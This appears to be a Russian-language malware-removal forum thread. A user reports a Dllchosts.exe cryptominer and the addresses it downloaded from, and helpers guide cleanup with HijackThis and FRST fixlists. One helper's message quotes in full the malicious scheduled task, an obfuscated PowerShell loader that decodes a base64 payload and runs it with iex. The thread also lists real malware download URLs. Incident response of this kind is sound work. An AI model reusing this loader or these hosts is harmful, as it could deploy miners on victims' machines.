Чертов Miner

[Helgiheim]

Доброго времени суток.Случайно обнаружил у себя на компе вирусняк майнера. Не знаю как от него избавиться.

Исполняемый файл Dllchosts.exe. Создает в 2 папки ProgramData/Windows и ProgramData/WindowsNT в них 2 файла непосредственно сам exeшник и .JSON, а также 2 ключа реестра на автозапуск.

Судя по отчету файрвола Касперского скачивает файл Dllchosts.dat отсюда

1 Разрешено: http://172.93.96.58:8646/miner/100/1 (проверка по базе вредоносных веб-адресов) 06.02.2018 7:35:01
2 Разрешено: http://192.168.1.1:1900/gatedesc.xml (проверка по базе вредоносных веб-адресов) 06.02.2018 7:47:37

или отсюда

http://80.82.79.12/ups/m
http://80.82.79.12/up/

Я по глупости сразу удалил все папки и ключи из реестра, не сохранив в архив, чтобы проанализировать можно было бы потом.
Дело в том что он появлялся недели 2 назад, тогда тоже все удалил.

[Info_bot]

Уважаемый(ая) Helgiheim, спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Helgiheim]

Добавил файл логов

[Vvvyg]

Не нужно прикреплять вирусы к сообщению, это запрещено правилами.

Устраняйте уязвимость, которую используют в т. ч. нашумевшие в прошлом году шифровальщики WannaCry и Petya, критическое обновление cкачайте для своей системы по ссылке отсюда:
http://www.catalog.update.microsoft....px?q=KB4012212
Иначе не избавитесь от заразы.

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O22 - Task: \Microsoft\Windows\NetworkAccessProtection\NetworkAccessProtection - C:\Program Files\Windows NT\Accessories\task.exe -Command "function dec([byte[]]$cb, [string]$pass){$pb = [System.Text.Encoding]::UTF8.GetBytes($pass);$s = $pb[0];$j=0;for($i = 0; $i -lt $cb.Count; $i++){if($j -ge $pb.Count){$j=0} $s = (23 -band $s -bor 152) -bxor $s;$cb[$i] = $cb[$i] -bxor $pb[$j] -bxor $s;$j++}return $cb;}$obj = gwmi win32_diskdrive | where {$_.DeviceID -eq '\\.\PHYSICALDRIVE0'} | select Model, Serialnumber;$d = dec ([System.Convert]::FromBase64String('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')) ($obj.Model + ' ' + $obj.Serialnumber);iex (iex('[System.Text.Encoding]::UTF8.Get'+'String($d)'))" (Microsoft)
O22 - Task: memreductSkipUac - D:\Temp\Rar$EX00.214\64\memreduct.exe $(Arg0) (file missing)

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

[Helgiheim]

Сделал вышеуказанное и прикрепил логи.
Смущает вот эта строка
ProxyServer: [S-1-5-21-1481152966-2975969495-3659747671-1000] => 217.8.95.189:8080 в разделе Internet (Whitelisted)

[Vvvyg]

Что за DNS серверы прописаны в системе - в курсе?

Код:

DNS Servers: 192.168.110.173 - 192.168.248.77

[Helgiheim]

Нет не в курсе, на всякий случай поставил получать автоматически

[Vvvyg]

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

CreateRestorePoint:
ProxyServer: [S-1-5-21-1481152966-2975969495-3659747671-1000] => 217.8.95.189:8080
Toolbar: HKU\S-1-5-21-1481152966-2975969495-3659747671-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
CHR HKLM-x32\...\Chrome\Extension: [aminlpmkfcdibgpgfajlgnamicjckkjf] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [dljdacfojgikogldjffnkdcielnklkce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lpoimibckejjdjcfbdnajaicnklhfplh] - hxxps://chrome.google.com/webstore/detail/lpoimibckejjdjcfbdnajaicnklhfplh
U3 ad5lc43r; no ImagePath
S3 cpuz138; \??\F:\Temp\cpuz138\cpuz138_x64.sys [X]
S3 cpuz139; \??\F:\Temp\cpuz139\cpuz139_x64.sys [X]
S3 cpuz140; \??\F:\Temp\cpuz140\cpuz140_x64.sys [X]
S3 massfilter; system32\drivers\massfilter.sys [X]
S3 mpfilt; \??\C:\Windows\system32\drivers\mpfilt.sys [X]
S3 MSICDSetup; \??\F:\ДИСКИ\MSI\CDriver64.sys [X]
S3 NTIOLib_1_0_3; \??\C:\Program Files (x86)\MSI\Super Charger\NTIOLib_X64.sys [X]
S3 NTIOLib_1_0_C; \??\F:\Диски\MSI\NTIOLib_X64.sys [X]
S4 RAMDiskVE; System32\Drivers\RAMDiskVE.sys [X]
S3 RTL8192su; system32\DRIVERS\RTL8192su.sys [X]
S1 tbfd_1_10_0_16; system32\drivers\tbfd_1_10_0_16.sys [X]
U3 TBS; no ImagePath
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
S3 ZTEusbmdm6k; system32\DRIVERS\ZTEusbmdm6k.sys [X]
S3 ZTEusbnmea; system32\DRIVERS\ZTEusbnmea.sys [X]
S3 ZTEusbser6k; system32\DRIVERS\ZTEusbser6k.sys [X]
S3 ZTEusbvoice; system32\DRIVERS\ZTEusbvoice.sys [X]
2018-02-08 18:18 - 2018-02-08 18:18 - 000000580 _____ C:\Users\Drukkarg\Desktop\Windows.rar
2018-02-08 18:16 - 2018-02-08 18:16 - 000000210 _____ C:\Users\Drukkarg\Desktop\Windows NT.rar
VirusTotal: C:\Windows\TmpFile1
2018-02-11 11:51 - 2017-03-22 19:24 - 008405015 _____ C:\Windows\TmpFile1
Shortcut: C:\Users\Drukkarg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Руководство по консольной версии RAR.lnk -> F:\Установки\Rar.txt (No File) <==== Cyrillic
Shortcut: C:\Users\Drukkarg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Справка WinRAR.lnk -> F:\Установки\WinRAR.hlp (No File) <==== Cyrillic
Shortcut: C:\Users\Drukkarg\AppData\Roaming\Microsoft\Windows\SendTo\МойМир@Mail.ru.lnk -> C:\Users\Drukkarg\AppData\Local\Mail.Ru\GameCenter\[email protected] (No File) <==== Cyrillic
Reboot:

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

Приложите этот файл к своему следующему сообщению.